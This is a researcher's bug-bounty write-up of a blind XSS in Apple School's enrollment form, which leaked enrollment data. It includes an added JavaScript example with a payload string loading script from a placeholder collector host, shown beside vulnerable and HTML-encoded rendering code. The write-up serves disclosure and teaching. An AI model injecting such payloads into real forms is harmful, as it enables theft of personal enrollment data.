Blind XSS in Apple School - Enrollment Data Disclosure

Hello!

I'm Hackrzvijay.

I found a blind XSS in Apple School (school.apple.com) in October 2020.

Reproduction Steps:

While researching Apple, I found the subdomain school.apple.com.

In the enrollment form I submitted my XSS Hunter payload multiple times (XSS Hunter is the blind-XSS tool created by iammandatory).

Within 5 to 10 seconds of submitting the payload, the injected script executed and the enrollment data arrived in my XSS Hunter dashboard.

Nearly 420 records were disclosed at the time of research; a much larger number could be harvested in real time by continuously submitting payloads.

Above is the disclosed data and below is the proof that my XSS Hunter payload executed.

The disclosed data includes:

Organization name
Enrollee first name and last name
Country
Assigned Apple employee email
Organization type

An attacker who continuously submits XSS Hunter payloads can receive new enrollment data in near real time, within 5 to 10 seconds of each submission.

Impact:

First, the attacker's injected script is stored with the enrollment submission and executes in the browser that renders the enrollment records on the back-end side; this is what makes it a blind XSS rather than a self-XSS.

Next, the script exfiltrates the enrollment data in bulk to the attacker's collector.
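To make the two impact steps concrete, here is an added example (not code from the original post or from Apple) that models how a stored enrollment field reaches the reviewer's browser as markup, and how output encoding at the point of rendering neutralizes it. The field names, the collector host collector.invalid and the enrollment record itself are all constructed for illustration and are not from the original page.

```javascript
// Added example, not code from the original post or from Apple.
// Models a back-end review form that prefills stored enrollment fields,
// first unencoded (vulnerable) and then HTML-encoded (hardened).
// Field names, the record and the collector host are constructed.

// Constructed enrollment record as the server would store it. The
// firstName field carries a typical blind-XSS probe: it closes the
// surrounding double-quoted attribute and the input element, then loads
// a script from the attacker's collector (placeholder host, not a real
// XSS Hunter endpoint).
const constructedRecord = {
  organizationName: "Example Academy",
  firstName: '"><script src="https://collector.invalid/probe.js"></script>',
  lastName: "Doe",
  country: "US",
  organizationType: "K-12",
};

// VULNERABLE: stored fields are interpolated straight into the HTML of
// the internal review form. Whatever the enrollee typed becomes markup in
// the reviewer's browser, which is exactly what blind XSS relies on.
function renderReviewFormVulnerable(record) {
  return `<form>
  <input name="org" value="${record.organizationName}">
  <input name="first" value="${record.firstName}">
  <input name="last" value="${record.lastName}">
  <input name="country" value="${record.country}">
  <input name="type" value="${record.organizationType}">
</form>`;
}

// HTML-encode the five characters that can break out of text content or
// a double-quoted attribute value.
function escapeHtml(value) {
  const map = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
  };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// HARDENED: every stored field is encoded at output time, so the payload
// is shown as the literal text the enrollee typed instead of executing.
function renderReviewFormHardened(record) {
  return `<form>
  <input name="org" value="${escapeHtml(record.organizationName)}">
  <input name="first" value="${escapeHtml(record.firstName)}">
  <input name="last" value="${escapeHtml(record.lastName)}">
  <input name="country" value="${escapeHtml(record.country)}">
  <input name="type" value="${escapeHtml(record.organizationType)}">
</form>`;
}

// Check a reviewer can run over rendered output: the template contains no
// <script> element, so any that appears came from stored user data.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demonstration.
const vulnerableHtml = renderReviewFormVulnerable(constructedRecord);
const hardenedHtml = renderReviewFormHardened(constructedRecord);
console.log("vulnerable render contains <script>:", containsScriptTag(vulnerableHtml));
console.log("hardened render contains <script>:", containsScriptTag(hardenedHtml));
```

The encoding shown is correct for HTML text and double-quoted attribute contexts only; a field rendered inside a script block, a URL or an event handler needs the encoding for that context. Because the page that renders the records is an internal one, a Content-Security-Policy that forbids script from untrusted origins is worth adding as defense in depth, since it would have blocked the remote probe.js load even if a field slipped through unencoded.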

I reported it immediately to Apple Security and they fixed the bug promptly.

Reported: October 13th, 2020

Bounty Rewarded: $5,000 on June 3rd, 2021

Thanks to the Apple Security Team!

Follow me on Twitter
